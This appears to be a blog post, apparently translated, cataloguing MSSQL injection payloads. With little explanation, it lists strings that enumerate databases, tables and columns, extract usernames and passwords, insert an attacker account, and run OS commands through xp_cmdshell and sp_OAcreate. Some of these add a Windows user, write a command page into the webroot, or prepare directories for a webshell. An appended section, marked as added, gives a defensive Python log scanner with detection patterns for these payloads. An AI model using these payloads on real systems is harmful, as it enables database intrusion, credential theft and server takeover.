SQL Injection Summary (2)

    Technology  2022-05-11  141

    For example:

    sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll'
    exec xp_webserver
    sp_dropextendedproc 'xp_webserver'
    bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar
    ' group by users.id having 1=1-
    ' group by users.id, users.username, users.password, users.privs having 1=1-
    '; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
    union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
    union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
    union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
    union select TOP 1 login_name FROM logintable-
    union select TOP 1 password FROM logintable where login_name='Rahul'--

    Constructed statements: checking whether xp_cmdshell exists

    ' union select @@version,1,1,1--
    and 1=(select @@VERSION)
    and 'sa'=(select System_user)
    ' union select ret,1,1,1 from foo--
    ' union select min(username),1,1,1 from users where username > 'a'-
    ' union select min(username),1,1,1 from users where username > 'admin'-
    ' union select password,1,1,1 from users where username = 'admin'--
    and user_name()='dbo'
    and 0<>(select user_name()-
    ; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 5245886 /add'
    and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
    ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
    1=( select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
    and 1=(select IS_SRVROLEMEMBER('sysadmin'))   checks whether the current login has sa (sysadmin) privileges
    and 0<>(select top 1 paths from newtable)--   the database-dumping trick
    and 1=(select name from master.dbo.sysdatabases where dbid=7)   gets a database name (dbids 1 to 5 are system databases; only 6 and above can be probed)

      Create a virtual directory for the E: drive:

    declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "默认 Web 站点" -v "e","e:/"'

    Access permissions (used together with writing a webshell):

    declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse'
    and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)   submit dbid = 7, 8, 9, ... in turn to get more database names
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')   dumps one table; assume it is admin
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin'))   to get the other tables
    and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))   dumps the UID value; assume it is 18779569 (uid=id)
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)   gets one column of admin; assume it is user_id
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...))   to dump the other columns
    and 0<(select user_id from BBS.dbo.admin where username>1)
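Added example, not part of the original post: a small Python scanner that flags the payload families listed above (catalog reads via sysobjects/syscolumns/sysdatabases, INFORMATION_SCHEMA walks, xp_/sp_OA procedures, union probes and the `and 0<>(select ...)` inference shape) in URL-encoded web access-log lines, so a defender can alert on them. The log lines and the signature names are constructed for this example.

```python
"""Constructed example (not from the original post): flag web requests that
carry the MSSQL enumeration and stored-procedure payloads listed above."""
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload families above (names are our own).
SIGNATURES = {
    "catalog_enum": re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b", re.I),
    "info_schema": re.compile(r"information_schema\.\w+", re.I),
    "ext_proc": re.compile(r"\b(xp_\w+|sp_oacreate|sp_oamethod|sp_addextendedproc)\b", re.I),
    "union_probe": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "server_fingerprint": re.compile(r"(@@version|system_user|is_srvrolemember)", re.I),
    # "and 0<>(select ...)" / "and 1=(select ...)" boolean inference shape
    "boolean_inference": re.compile(r"\b(and|or)\s+\d+\s*(=|<>|<|>)\s*\(\s*select\b", re.I),
}

def classify(request_line):
    """Return the signature names that match one access-log line after URL decoding."""
    decoded = unquote_plus(request_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Yield (line_no, matched_signatures) for every suspicious access-log entry."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, hits

# Constructed access-log lines (not real traffic) in Common Log Format.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/May/2022:10:00:01 +0800] "GET /news.asp?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/May/2022:10:00:02 +0800] "GET /news.asp?id=7%20and%200%3C%3E(select%20top%201%20name%20from%20bbs.dbo.sysobjects%20where%20xtype%3D%27U%27) HTTP/1.1" 500 233',
    '10.0.0.9 - - [11/May/2022:10:00:03 +0800] "GET /news.asp?id=7%27%20union%20select%20@@version,1,1,1-- HTTP/1.1" 500 233',
    '10.0.0.9 - - [11/May/2022:10:00:04 +0800] "GET /news.asp?id=7;exec%20master.dbo.sp_addextendedproc%20%27xp_cmdshell%27,%27xplog70.dll%27 HTTP/1.1" 500 233',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Decode before matching: the same payload arrives percent-encoded, with `+` for spaces, or with mixed case, and a raw-string match misses all three.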
